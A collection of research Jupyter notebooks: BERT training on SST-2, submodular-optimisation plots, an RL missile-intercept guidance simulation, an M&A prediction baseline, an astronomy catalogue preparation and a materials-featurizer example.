int(np.ceil(total_steps*0.8))
]
break_points = [0] + list(np.cumsum(lr_durations))[:-1]
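A worked example of this warmup/annealing split, with a hypothetical `total_steps = 100`: 20% linear warmup then 80% cosine annealing, with the two stages starting at steps 0 and 20:

```python
import numpy as np

total_steps = 100  # hypothetical, for illustration
lr_durations = [int(total_steps * 0.2), int(np.ceil(total_steps * 0.8))]
# Each stage starts where the cumulative duration of the previous stages ends
break_points = [0] + list(np.cumsum(lr_durations))[:-1]
```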
callbacks = [
MovingAverageStatsTrackerCallback(
avg_window=len(train_loader) // 8,
log_interval=len(train_loader) // 10
),
LearningRateSchedulerCallback(
MultiStageScheduler(
[
LinearLR(optimizer, 0.01, lr_durations[0]),
CosineAnnealingLR(optimizer, lr_durations[1])
],
start_at_epochs=break_points
)
),
checkpoints
]
bot = SST2Bot(
model=model,
train_loader=train_loader,
valid_loader=valid_loader,
clip_grad=10.,
optimizer=optimizer, echo=True,
criterion=torch.nn.CrossEntropyLoss(),
callbacks=callbacks,
pbar=False, use_tensorboard=False,
use_amp=APEX_AVAILABLE,
metrics=(Top1Accuracy(),)
)
# -
print(total_steps)
bot.train(
total_steps=total_steps,
checkpoint_interval=len(train_loader) // 2
)
bot.load_model(checkpoints.best_performers[0][1])
checkpoints.remove_checkpoints(keep=0)
TARGET_DIR = CACHE_DIR / "sst2_bert_uncased"
TARGET_DIR.mkdir(exist_ok=True)
bot.model.save_pretrained(TARGET_DIR)
bot.eval(valid_loader)
bot.eval(test_loader)
tokenizer.pad_token_id
|
notebooks/01-2-BERT-sst2-split-dev.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ### Import packages
# +
# %matplotlib inline
import matplotlib
import matplotlib.pyplot as plt
import os
import sys
import dill
import yaml
import numpy as np
import pandas as pd
import ast
import seaborn as sns
sns.set(style='ticks')
# -
# ### Import submodular-optimization packages
sys.path.insert(0, "/Users/smnikolakaki/GitHub/submodular-linear-cost-maximization/submodular_optimization/")
# ### Visualizations directory
VIZ_DIR = os.path.abspath("/Users/smnikolakaki/GitHub/submodular-linear-cost-maximization/submodular_optimization/viz/")
# ### Plotting utilities
def set_style():
# This sets reasonable defaults for font size for a paper
sns.set_context("paper")
# Set the font to be serif
sns.set(font='serif')#, rc={'text.usetex' : True})
# Make the background white, and specify the specific font family
sns.set_style("white", {
"font.family": "serif",
"font.serif": ["Times", "Palatino", "serif"]
})
# Set tick size for axes
sns.set_style("ticks", {"xtick.major.size": 6, "ytick.major.size": 6})
def set_size(fig, width=6, height=4):
fig.set_size_inches(width, height)
plt.tight_layout()
def save_fig(fig, filename):
fig.savefig(os.path.join(VIZ_DIR, filename), dpi=600, format='pdf', bbox_inches='tight')
# ### Plots
# +
df = pd.read_csv("/Users/smnikolakaki/GitHub/submodular-linear-cost-maximization/jupyter/experiment_00.csv",
header=0,
index_col=False)
df.columns = ['Algorithm', 'sol', 'val', 'submodular_val', 'cost', 'runtime', 'lazy_epsilon',
'sample_epsilon','user_sample_ratio','scaling_factor','num_rare_skills','num_common_skills',
'num_popular_skills','num_sampled_skills','seed','k']
# -
# #### Details
# Original marginal gain: $$g(e|S) = f(e|S) - w(e)$$
# Scaled marginal gain: $$\tilde{g}(e|S) = f(e|S) - 2w(e)$$
# Distorted marginal gain: $$\hat{g}(e|S) = (1-\frac{\gamma}{n})^{n-(i+1)}f(e|S) - w(e)$$
#
# #### Algorithms:
# 1. Cost Scaled Greedy: The algorithm performs iterations i = 0,...,n-1. In each iteration the algorithm selects the element that maximizes the scaled marginal gain. It adds the element to the solution if the original marginal gain of the element is >= 0. The algorithm returns a solution S: f(S) - w(S) >= (1/2)f(OPT) - w(OPT). The running time is O($n^2$).
#
#
# 2. Cost Scaled Exact Lazy Greedy: The algorithm first initializes a max heap with all the elements. The key of each element is its scaled marginal gain and the value is the element id. If the scaled marginal gain of an element is < 0 the algorithm discards the element and never inserts it in the heap. Then, for 0,...,n-1 iterations the algorithm does the following: (i) pops the top element from the heap and computes its new scaled marginal gain, (ii) it checks the old scaled marginal gain of the next element in the heap, (iii) if the popped element's new scaled marginal gain is >= the next element's old gain we return the popped element, otherwise if its new scaled marginal gain is >= 0 we reinsert the element into the heap and repeat step iii, otherwise we discard it and repeat step iii, (iv) if the returned element's original marginal gain is >= 0 we add it to the solution. The algorithm returns a solution S: f(S) - w(S) >= (1/2)f(OPT) - w(OPT). The running time is O($n^2$).
#
#
# 3. Unconstrained Linear: The algorithm performs i = 0,...,n-1 iterations (one for each arriving element). For each element it adds it to the solution if its scaled marginal gain is > 0. The algorithm returns a solution S: f(S) - w(S) >= (1/2)f(OPT) - w(OPT). The running time is O($n$).
#
#
# 4. Distorted Greedy: The algorithm performs i = 0,...,n-1 iterations. In each iteration the algorithm selects the element that maximizes the distorted marginal gain. It adds the element to the solution if the distorted marginal gain of the element is > 0. The algorithm returns a solution S: f(S) - w(S) >= (1-1/e)f(OPT) - w(OPT). The running time is O($n^2$). The algorithmic implementation is based on Algorithm 1 found [here](https://arxiv.org/pdf/1904.09354.pdf) for k=n.
#
#
# 5. Stochastic Distorted Greedy: The algorithm performs i = 0,...,n-1 iterations. In each iteration the algorithm chooses a sample of s=log(1/ε) elements uniformly and independently and from this sample it selects the element that maximizes the distorted marginal gain. It adds the element to the solution if the distorted marginal gain of the element is > 0. We set $ε=0.01$. The algorithm returns a solution S: E[f(S) - w(S)] >= (1-1/e-ε)f(OPT) - w(OPT). The running time is O($n\log{1/ε}$). The algorithmic implementation is based on Algorithm 2 found [here](https://arxiv.org/pdf/1904.09354.pdf) for k=n.
#
#
# 6. Unconstrained Distorted Greedy: The algorithm performs i = 0,...,n-1 iterations. In each iteration the algorithm chooses a random single element uniformly. It adds the element to the solution if the distorted marginal gain of the element is > 0. The algorithm returns a solution S: E[f(S) - w(S)] >= (1-1/e)f(OPT) - w(OPT). The running time is O($n$).
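A minimal sketch of Distorted Greedy (algorithm 4 above, taking γ = 1) on a toy coverage objective — the instance, names and weights here are illustrative, not from the experiments:

```python
def distorted_greedy(f, w, elements):
    # At iteration i, pick the element maximizing the distorted marginal gain
    # (1 - 1/n)^(n-(i+1)) * f(e|S) - w(e); add it only if that gain is > 0.
    n = len(elements)
    S = set()
    for i in range(n):
        factor = (1 - 1.0 / n) ** (n - (i + 1))
        best, best_gain = None, 0.0
        for e in elements:
            if e in S:
                continue
            gain = factor * (f(S | {e}) - f(S)) - w[e]
            if gain > best_gain:
                best, best_gain = e, gain
        if best is not None:
            S.add(best)
    return S

# Toy instance: f(S) = number of items covered by S, linear costs w
cover = {'a': {1, 2, 3}, 'b': {3, 4}, 'c': {5}}
w = {'a': 1.0, 'b': 0.5, 'c': 2.0}
f = lambda S: len(set().union(*(cover[e] for e in S))) if S else 0
S = distorted_greedy(f, w, list(cover))
```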
# #### Performance comparison
def plot_performance_comparison(df):
ax = sns.lineplot(x='user_sample_ratio', y='val', data=df, hue='Algorithm', ci='sd')
plt.xlabel('User sample size (% of total users)')
plt.ylabel('Value of objective function')
plt.title('Performance comparison')
fig = plt.gcf()
ax = plt.gca()
return fig, ax
# +
df = df[(df.Algorithm == 'distorted_greedy')
|(df.Algorithm == 'cost_scaled_greedy')
|(df.Algorithm == 'cost_scaled_lazy_exact_greedy')
|(df.Algorithm == 'unconstrained_linear')
|(df.Algorithm == 'unconstrained_distorted_greedy')
|(df.Algorithm == 'stochastic_distorted_greedy')
]
df0 = df[(df['sample_epsilon'].isnull()) | (df['sample_epsilon'] == 0.01)]
set_style()
fig, axes = plot_performance_comparison(df0)
set_size(fig, 10, 8)
# -
# #### Runtime comparison for different dataset sizes
def plot_runtime_comparison(df):
    ax = sns.lineplot(x='user_sample_ratio', y='runtime', data=df, hue='Algorithm', ci='sd')
    plt.xlabel('User sample size (% of total users)')
    plt.ylabel('Time (sec)')
    plt.title('Runtime comparison')
    # plt.yscale('log')
    fig = plt.gcf()
    ax = plt.gca()
    return fig, ax
df = df[(df.Algorithm == 'distorted_greedy')
        |(df.Algorithm == 'cost_scaled_greedy')
        |(df.Algorithm == 'cost_scaled_lazy_exact_greedy')
        |(df.Algorithm == 'unconstrained_linear')
        |(df.Algorithm == 'unconstrained_distorted_greedy')
        |(df.Algorithm == 'stochastic_distorted_greedy')
       ]
df0 = df[(df['sample_epsilon'].isnull()) | (df['sample_epsilon'] == 0.01)]
set_style()
fig, axes = plot_runtime_comparison(df0)
set_size(fig, 10, 8)
|
jupyter/.ipynb_checkpoints/Experiment_unconstrained_problem-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import os,sys
sys.path.append('../../../RL_lib/Agents')
sys.path.append('../../../RL_lib/Policies/PPO')
sys.path.append('../../../RL_lib/Policies/Common')
sys.path.append('../../../RL_lib/Utils')
sys.path.append('../../Env')
sys.path.append('../../Imaging')
# %load_ext autoreload
# %autoreload 2
# %matplotlib nbagg
print(os.getcwd())
# + language="html"
# <style>
# .output_wrapper, .output {
# height:auto !important;
# max-height:1000px; /* your desired max-height here */
# }
# .output_scroll {
# box-shadow:none !important;
# webkit-box-shadow:none !important;
# }
# </style>
# -
# # Optimize Policy
# +
from env import Env
import env_utils as envu
from reward_sensor_gaussian_of import Reward
import attitude_utils as attu
from missile import Missile
from target import Target
from missile_icgen import Missile_icgen
from target_icgen import Target_icgen
from dynamics_model_3dof import Dynamics_model_3dof as Target_dynamics_model
from dynamics_model_6dof import Dynamics_model_6dof as Missile_dynamics_model
from bangbang_policy_ra import BangBang_policy as Target_policy
from no_att_constraint import No_att_constraint
from no_w_constraint import No_w_constraint
######### RL vs PN ###########
is_RL = False
########## RL ###########
import rl_utils
from arch_policy_vf import Arch
import policy_nets as policy_nets
import valfunc_nets as vf_nets
from agent import Agent
from value_function import Value_function
if is_RL:
from policy import Policy
from softmax_pd import Softmax_pd as PD
else:
from zem_policy import ZEM_policy as Policy
######### Actuator Models #########
from actuator_model_ekv import Actuator_model_ekv as Missile_actuator_model
from actuator_model_3dof import Actuator_model_3dof as Target_actuator_model
######## Sensor ##############
from angle_sensor import Angle_sensor
from eo_model import EO_model
import optics_utils as optu
ap = attu.Quaternion_attitude()
offset=np.asarray([0,0])
C_cb = optu.rotate_optical_axis(0.0, np.pi/2, 0.0)
r_cb = np.asarray([0,0,0])
fov=np.pi-np.pi/8
cm = EO_model(attitude_parameterization=ap, C_cb=C_cb, r_cb=r_cb,
fov=fov, debug=False, p_x=96,p_y=96)
sensor = Angle_sensor(cm, attitude_parameterization=ap, use_range=True, ignore_fov_vio=not is_RL,
use_ideal_offset=False,
pool_type='max', state_type=Angle_sensor.optflow_state, optflow_scale=0.1)
########## Target ############
target_voffset = 10
target_max_acc = 5*9.81
target_max_acc_range = (0., target_max_acc)
target_dynamics_model = Target_dynamics_model(h=0.02,M=1e3)
target_actuator_model = Target_actuator_model(max_acc=target_max_acc)
target_policy = Target_policy(3,max_acc_range=target_max_acc_range,tf=80)
target = Target(target_policy, target_actuator_model, target_dynamics_model, attitude_parameterization=ap)
target_icgen = Target_icgen(attitude_parameterization=ap,
min_init_position=(0.0, 0.0, 50000.),
max_init_position=(0.0, 0.0, 50000.),
v_mag=(4000., 4000.),
v_theta=(envu.deg2rad(90-target_voffset), envu.deg2rad(90+target_voffset)),
v_phi=(envu.deg2rad(-target_voffset), envu.deg2rad(target_voffset)))
########## Missile #############
missile_roffset = 10
missile_mass = 50
missile_max_thrust = 10*9.81*missile_mass
missile_dynamics_model = Missile_dynamics_model(h=0.02,M=1e3)
missile_actuator_model = Missile_actuator_model(max_thrust=missile_max_thrust,pulsed=True)
missile = Missile(target, missile_actuator_model, missile_dynamics_model, sensor=sensor,
attitude_parameterization=ap,
w_constraint=No_w_constraint(), att_constraint=No_att_constraint(ap),
align_cv=False, debug_cv=False, perturb_pn_velocity=True)
if not is_RL:
missile.get_state_agent = missile.get_state_agent_PN_att
missile_icgen = Missile_icgen(attitude_parameterization=ap,
position_r=(50000.,55000.),
position_theta=(envu.deg2rad(90-missile_roffset),envu.deg2rad(90+missile_roffset)),
position_phi=(envu.deg2rad(-missile_roffset),envu.deg2rad(missile_roffset)),
mag_v=(3000,3000),
heading_error=(envu.deg2rad(0),envu.deg2rad(5)),
attitude_error=(0.0,0.0),
debug=False)
reward_object = Reward(debug=False, hit_coeff=10., tracking_coeff=1., tracking_sigma=0.10, optflow_sigma=0.004,
fuel_coeff=0.0, fov_coeff=-0., hit_rlimit=0.5)
logger = rl_utils.Logger()
env = Env(missile, target, missile_icgen, target_icgen, logger,
precision_range=1000., precision_scale=300, terminate_on_vc=not is_RL,
reward_object=reward_object, use_offset=False, debug_steps=True,
tf_limit=50.0,print_every=10,nav_period=0.06)
##########################################
recurrent_steps = 200
if is_RL:
obs_dim = 4
action_dim = 4
actions_per_dim = 2
logit_dim = action_dim * actions_per_dim
policy = Policy(policy_nets.GRU1(obs_dim, logit_dim, recurrent_steps=recurrent_steps),
PD(action_dim, actions_per_dim),
shuffle=False,
kl_targ=0.001,epochs=20, beta=0.1, servo_kl=True, max_grad_norm=30, scale_vector_obs=True,
init_func=rl_utils.xn_init)
else:
policy = Policy(ap=ap, N=3, max_acc=missile_max_thrust / missile_mass)
obs_dim = 19
act_dim = 4
arch = Arch()
value_function = Value_function(vf_nets.GRU1(obs_dim, recurrent_steps=recurrent_steps), scale_obs=True,
shuffle=False, batch_size=9999999, max_grad_norm=30,
verbose=False)
agent = Agent(arch, policy, value_function, None, env, logger,
policy_episodes=30, policy_steps=3000, gamma1=0.90, gamma2=0.995,
recurrent_steps=recurrent_steps, monitor=env.rl_stats)
if is_RL:
agent.train(300000)
# -
# # Test Policy
#
# +
env.test_policy_batch(agent,5000,print_every=100,test_mode=True)
# -
|
Experiments/Test_PN/Test_ZEM-nav=6.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import seaborn as sb
import matplotlib.pyplot as plt
import sklearn
import arrow
import datetime as dt
from sklearn.utils import resample
from pylab import rcParams
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn import ensemble
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score
# -
# %matplotlib inline
rcParams['figure.figsize'] = 10, 8
sb.set_style('whitegrid')
comp = pd.read_csv('comp_filter.csv')
comp
comp.info()
# convert non-numeric entries (such as '-') in comp['funding_total_usd'] to NaN
comp['funding_total_usd'] = pd.to_numeric(comp['funding_total_usd'], errors='coerce')
# select meaningful features
comp_data = comp[['name','funding_total_usd','country_code','funding_rounds',#'founded_at',
'first_funding_at','last_funding_at','category_1','label']]
comp_data.isnull().sum()
# drop all rows with missing values (reassign instead of inplace on a slice
# to avoid pandas' SettingWithCopyWarning)
comp_data = comp_data.dropna()
comp_data.isnull().sum()
comp_data['country_code']
comp_data.info()
# +
# comp_data.head(10)
# comp_data is a clean dataset and ready to use!!!
# -
label = sb.countplot(x='label',data=comp_data, palette='hls')
fig_ = label.get_figure()
fig_.savefig('label.png')
# # Baseline Model w/ Logistic Regression
#
# ## 1.1 Logistic Regression Model w/ only numerical features
# Only select the numerical data as features
logReg_data = comp_data[['funding_total_usd','funding_rounds','label']]
logReg_data.label.value_counts()[1]
# handle the class-imbalance problem by downsampling the majority class
def balance(df):
# Separate majority and minority classes
df_majority = df[df.label==0]
df_minority = df[df.label==1]
    # n is the number of samples in the minority class (label == 1)
    n = df.label.value_counts()[1]
    # # Upsample minority class
    # df_minority_upsampled = resample(df_minority,
    #                              replace=True,     # sample with replacement
    #                              n_samples=47312,  # to match majority class
    #                              random_state=123) # reproducible results
    # Downsample majority class
    df_majority_downsampled = resample(df_majority,
                                 replace=False,    # sample without replacement
                                 n_samples=n,      # to match minority class
                                 random_state=123) # reproducible results
    # Combine minority class with downsampled majority class
    # df_upsampled = pd.concat([df_majority, df_minority_upsampled])
    df_downsampled = pd.concat([df_minority, df_majority_downsampled])
    return df_downsampled
logReg_data_balanced = balance(logReg_data)
logReg_data_balanced.label.value_counts()
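# As a sanity check, the downsampling logic inside `balance` can be run on a
# toy frame (a hypothetical 6-vs-2 label split, not the real dataset):

```python
import pandas as pd
from sklearn.utils import resample

# Toy frame: 6 majority (label=0) rows, 2 minority (label=1) rows
toy = pd.DataFrame({'x': range(8), 'label': [0, 0, 0, 0, 0, 0, 1, 1]})

n_min = toy.label.value_counts()[1]           # minority class size -> 2
majority_down = resample(toy[toy.label == 0],
                         replace=False,       # sample without replacement
                         n_samples=n_min,     # shrink majority to minority size
                         random_state=123)
balanced = pd.concat([toy[toy.label == 1], majority_down])
print(balanced.label.value_counts().to_dict())
```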
X = logReg_data_balanced.iloc[:,:-1]
y = logReg_data_balanced.iloc[:,-1]
# conduct the feature scaling/normalization
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=2)
scaler = sklearn.preprocessing.StandardScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
LogReg = LogisticRegression()
LogReg.fit(X_train, y_train)
y_pred = LogReg.predict(X_test)
sum(y_pred)
accuracy_score(y_test, y_pred)
y_train_pred = LogReg.predict(X_train)
accuracy_score(y_train, y_train_pred)
# +
# X_train_ = np.clip(X_train, None, 5)
plt.plot(X_train[np.where(y_train == 1),0], X_train[np.where(y_train == 1),1], 'go')
#X_train_[np.where(y_train == 0),0], X_train_[np.where(y_train == 0),1], 'rx')
plt.plot(X_train[np.where(y_train == 0),0], X_train[np.where(y_train == 0),1], 'rx')
plt.savefig('LogReg_numOnly_train.png')
plt.show()
# -
# ## 1.2 Logistic Regression Model w/ all features
# copy comp_data so we can preprocess the categorical encodings and the timestamp features
LogReg_data = comp_data.copy()
LogReg_data.info()
LogReg_data
# first balance the dataset
LogReg_data_balanced = balance(LogReg_data)
LogReg_data_balanced.info()
LogReg_data_balanced.loc[35632]
# +
# # Encode 'category' features, label them with values between 0 and n_classes-1
# df = LogReg_data_balanced
# col = 'category_1'
# le = preprocessing.LabelEncoder()
# col_label = le.fit_transform(list(df[col]))
# df[col + '_encode']= col_label #pd.Series(col_label)
# -
LogReg_data_balanced.loc[35632]
# Encode 'category' features, label them with values between 0 and n_classes-1
def encoder_cat(df, col):
le = preprocessing.LabelEncoder()
col_label = le.fit_transform(list(df[col]))
df[col]=col_label
return le
# encode text features into a bag-of-words matrix
from sklearn.feature_extraction.text import CountVectorizer
def encoder_text(df, col, min_df=10):
    df[col] = df[col].astype(str)
    vectorizer = CountVectorizer(min_df=min_df)
    vectorizer.fit(df[col])
    col_bag_of_words = vectorizer.transform(df[col])
    return col_bag_of_words
# Only run once !!!
country_list = encoder_cat(LogReg_data_balanced, 'country_code')
category_list = encoder_cat(LogReg_data_balanced, 'category_1')
LogReg_data_balanced
country_list.classes_
category_list.classes_
# calculate the duration (in days) between 'first_funding_at' and 'last_funding_at';
# subtracting two datetime series yields timedeltas, and .dt.days gives whole days
t1 = pd.to_datetime(LogReg_data_balanced.first_funding_at, errors='coerce')
t2 = pd.to_datetime(LogReg_data_balanced.last_funding_at, errors='coerce')
LogReg_data_balanced['funding_duration'] = (t2 - t1).dt.days
LogReg_data_balanced.head()
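# A quick check of the duration computation on hypothetical dates: subtracting
# two datetime series yields timedeltas, and `.dt.days` extracts whole days.

```python
import pandas as pd

first = pd.to_datetime(pd.Series(['2010-01-01', '2012-06-15']), errors='coerce')
last = pd.to_datetime(pd.Series(['2010-12-31', '2013-06-15']), errors='coerce')
duration = (last - first).dt.days
print(duration.tolist())  # [364, 365]
```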
X = LogReg_data_balanced[['funding_total_usd','funding_rounds','funding_duration','category_1','country_code']]
# plot the correlation between the features
corr = sb.heatmap(X.corr())
fig = corr.get_figure()
fig.savefig('corr.png')
X.info()
y = LogReg_data_balanced.label
X.values
# One-hot encode 'category_1' and 'country_code' (columns 3 and 4).
# `categorical_features` was removed from OneHotEncoder in scikit-learn 0.22,
# so a ColumnTransformer is used instead; the encoded indicator columns come
# first in the output and the passed-through numeric columns come last.
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder
onehotencoder = ColumnTransformer([('onehot', OneHotEncoder(), [3, 4])],
                                  remainder='passthrough', sparse_threshold=0)
X = onehotencoder.fit_transform(X)
# split the dataset to training set and test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=2)
scaler = sklearn.preprocessing.StandardScaler()
scaler.fit(X_train[:, -3:])
X_train = np.hstack([X_train[:, :-3], scaler.transform(X_train[:, -3:])])
X_test = np.hstack([X_test[:, :-3], scaler.transform(X_test[:, -3:])])
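# The column layout matters here: the one-hot indicator columns sit at the
# front and the numeric columns at the back, so scaling `[:, -3:]` touches only
# the numeric features. A minimal sketch with hypothetical data:

```python
import numpy as np
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder, StandardScaler

# Hypothetical data, 3 rows of [numeric, category]; encode column 1 only
X_demo = np.array([[100., 0.], [200., 1.], [300., 0.]])
ct_demo = ColumnTransformer([('onehot', OneHotEncoder(), [1])],
                            remainder='passthrough', sparse_threshold=0)
Xt_demo = ct_demo.fit_transform(X_demo)
print(Xt_demo.shape)  # (3, 3): two indicator columns first, numeric column last

# Standardize only the trailing numeric column, leave the indicators as-is
scaler_demo = StandardScaler().fit(Xt_demo[:, -1:])
Xs_demo = np.hstack([Xt_demo[:, :-1], scaler_demo.transform(Xt_demo[:, -1:])])
print(Xs_demo[:, :2].tolist())  # indicator columns unchanged
```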
model = sklearn.ensemble.RandomForestClassifier(n_estimators=50)
#model = LogisticRegression()
model.fit(X_train, y_train)
y_pred = model.predict(X_train)
accuracy_score(y_train, y_pred)
y_pred = model.predict(X_test)
accuracy_score(y_test, y_pred)
comp_data['country_code']
|
Baseline-for-M&A-Prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python (herschelhelp_internal)
# language: python
# name: helpint
# ---
# # ELAIS-N1 master catalogue
# ## Preparation of UKIRT Infrared Deep Sky Survey / Deep Extragalactic Survey (UKIDSS/DXS)
#
# The catalogue comes from `dmu0_UKIDSS-DXS_DR10plus`.
#
# In the catalogue, we keep:
#
# - The identifier (it's unique in the catalogue);
# - The position;
# - The stellarity;
# - The magnitude for each band in aperture 3 (2 arcsec);
# - The Kron magnitude, to be used as total magnitude (no “auto” magnitude is provided).
#
# The magnitudes are “*Vega like*”. The AB offsets are given by Hewett *et al.*
# (2016):
#
# | Band | AB offset |
# |------|-----------|
# | J | 0.938 |
# | H | 1.379 |
# | K | 1.900 |
#
# A query to the UKIDSS database with 242.9+55.071 position returns a list of images taken between 2007 and 2009. Let's take 2008 for the epoch.
#
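# As a sanity check on these offsets: a Vega magnitude converts to AB by adding
# the band offset, and an AB magnitude m corresponds to a flux of
# 3631 × 10^(−0.4 m) Jy. A standalone sketch in plain Python (this is not the
# `mag_to_flux` helper used below):

```python
# Hewett et al. (2016) Vega-to-AB offsets for the UKIDSS bands
AB_OFFSET = {'J': 0.938, 'H': 1.379, 'K': 1.900}

def vega_to_ab(mag_vega, band):
    return mag_vega + AB_OFFSET[band]

def ab_mag_to_flux_ujy(mag_ab):
    # AB zero point is 3631 Jy; return the flux in micro-Jansky
    return 3631.0 * 10 ** (-0.4 * mag_ab) * 1.0e6

m_ab = vega_to_ab(18.0, 'J')     # 18.938 in AB
print(ab_mag_to_flux_ujy(m_ab))  # roughly 97 uJy
```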
from herschelhelp_internal import git_version
print("This notebook was run with herschelhelp_internal version: \n{}".format(git_version()))
# +
# %matplotlib inline
# #%config InlineBackend.figure_format = 'svg'
import matplotlib.pyplot as plt
plt.rc('figure', figsize=(10, 6))
from collections import OrderedDict
import os
from astropy import units as u
from astropy.coordinates import SkyCoord
from astropy.table import Column, Table
import numpy as np
from herschelhelp_internal.flagging import gaia_flag_column
from herschelhelp_internal.masterlist import nb_astcor_diag_plot, remove_duplicates
from herschelhelp_internal.utils import astrometric_correction, mag_to_flux
# +
OUT_DIR = os.environ.get('TMP_DIR', "./data_tmp")
try:
os.makedirs(OUT_DIR)
except FileExistsError:
pass
RA_COL = "dxs_ra"
DEC_COL = "dxs_dec"
# -
# ## I - Column selection
# +
imported_columns = OrderedDict({
'sourceid': 'dxs_id',
'RA': 'dxs_ra',
'Dec': 'dxs_dec',
'JAPERMAG3': 'm_ap_ukidss_j',
'JAPERMAG3ERR': 'merr_ap_ukidss_j',
'JKRONMAG': 'm_ukidss_j',
'JKRONMAGERR': 'merr_ukidss_j',
'KAPERMAG3': 'm_ap_ukidss_k',
'KAPERMAG3ERR': 'merr_ap_ukidss_k',
'KKRONMAG': 'm_ukidss_k',
'KKRONMAGERR': 'merr_ukidss_k',
'PSTAR': 'dxs_stellarity'
})
catalogue = Table.read(
"../../dmu0/dmu0_UKIDSS-DXS_DR10plus/data/UKIDSS-DR10plus_ELAIS-N1.fits")[list(imported_columns)]
for column in imported_columns:
catalogue[column].name = imported_columns[column]
epoch = 2008
# Clean table metadata
catalogue.meta = None
# +
# Adding flux and band-flag columns
for col in catalogue.colnames:
if col.startswith('m_'):
errcol = "merr{}".format(col[1:])
# DXS uses a huge negative number for missing values
catalogue[col][catalogue[col] < -100] = np.nan
catalogue[errcol][catalogue[errcol] < -100] = np.nan
# Vega to AB correction
if col.endswith('j'):
catalogue[col] += 0.938
elif col.endswith('k'):
catalogue[col] += 1.900
else:
print("{} column has wrong band...".format(col))
flux, error = mag_to_flux(np.array(catalogue[col]), np.array(catalogue[errcol]))
# Fluxes are added in µJy
catalogue.add_column(Column(flux * 1.e6, name="f{}".format(col[1:])))
catalogue.add_column(Column(error * 1.e6, name="f{}".format(errcol[1:])))
# Band-flag column
if "ap" not in col:
catalogue.add_column(Column(np.zeros(len(catalogue), dtype=bool), name="flag{}".format(col[1:])))
# TODO: Set to True the flag columns for fluxes that should not be used for SED fitting.
# -
catalogue[:10].show_in_notebook()
# ## II - Removal of duplicated sources
# We remove duplicated objects from the input catalogues.
# +
SORT_COLS = ['merr_ap_ukidss_j', 'merr_ap_ukidss_k']
FLAG_NAME = 'dxs_flag_cleaned'
nb_orig_sources = len(catalogue)
catalogue = remove_duplicates(catalogue, RA_COL, DEC_COL, sort_col=SORT_COLS, flag_name=FLAG_NAME)
nb_sources = len(catalogue)
print("The initial catalogue had {} sources.".format(nb_orig_sources))
print("The cleaned catalogue has {} sources ({} removed).".format(nb_sources, nb_orig_sources - nb_sources))
print("The cleaned catalogue has {} sources flagged as having been cleaned".format(np.sum(catalogue[FLAG_NAME])))
# -
# ## III - Astrometry correction
#
# We match the astrometry to the Gaia one. We limit the Gaia catalogue to sources with a g band flux between the 30th and the 70th percentiles. Some quick tests show that this gives the lowest dispersion in the results.
gaia = Table.read("../../dmu0/dmu0_GAIA/data/GAIA_ELAIS-N1.fits")
gaia_coords = SkyCoord(gaia['ra'], gaia['dec'])
nb_astcor_diag_plot(catalogue[RA_COL], catalogue[DEC_COL],
gaia_coords.ra, gaia_coords.dec)
# +
delta_ra, delta_dec = astrometric_correction(
SkyCoord(catalogue[RA_COL], catalogue[DEC_COL]),
gaia_coords
)
print("RA correction: {}".format(delta_ra))
print("Dec correction: {}".format(delta_dec))
# -
catalogue[RA_COL] += delta_ra.to(u.deg)
catalogue[DEC_COL] += delta_dec.to(u.deg)
nb_astcor_diag_plot(catalogue[RA_COL], catalogue[DEC_COL],
gaia_coords.ra, gaia_coords.dec)
# ## IV - Flagging Gaia objects
catalogue.add_column(
gaia_flag_column(SkyCoord(catalogue[RA_COL], catalogue[DEC_COL]), epoch, gaia)
)
# +
GAIA_FLAG_NAME = "dxs_flag_gaia"
catalogue['flag_gaia'].name = GAIA_FLAG_NAME
print("{} sources flagged.".format(np.sum(catalogue[GAIA_FLAG_NAME] > 0)))
# -
# # V - Saving to disk
catalogue.write("{}/UKIDSS-DXS.fits".format(OUT_DIR), overwrite=True)
|
dmu1/dmu1_ml_ELAIS-N1/1.2_UKIDSS-DXS.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.9.10 ('autocat39')
# language: python
# name: python3
# ---
# +
from autocat.surface import generate_surface_structures
from autocat.saa import generate_saa_structures
from autocat.utils import extract_structures
from autocat.learning.featurizers import Featurizer
from dscribe.descriptors import CoulombMatrix
from matminer.featurizers.composition import ElementProperty
# -
# In this example we show how to use `AutoCat` to featurize structures with the `Featurizer` class.
#
# Here we will be featurizing mono-elemental surfaces.
# +
# Generate structures to be featurized
mono_surfaces_dictionary = generate_surface_structures(
species_list=["Fe", "Ru", "Cu", "Pd"],
facets={"Fe": ["110"], "Ru":["0001"], "Cu":["111"], "Pd":["111"]}
)
mono_surfaces_structures = extract_structures(mono_surfaces_dictionary)
saa_surfaces_dictionary = generate_saa_structures(
host_species=["Cu", "Au"],
dopant_species=["Pt", "Pd"],
facets={"Cu":["111"], "Au":["111"]}
)
saa_surfaces_structures = extract_structures(saa_surfaces_dictionary)
all_structures = mono_surfaces_structures.copy()
all_structures.extend(saa_surfaces_structures)
# -
print(all_structures[0].get_chemical_formula())
# Instantiate featurizer based on Coulomb Matrix
coulomb_featurizer = Featurizer(
featurizer_class=CoulombMatrix,
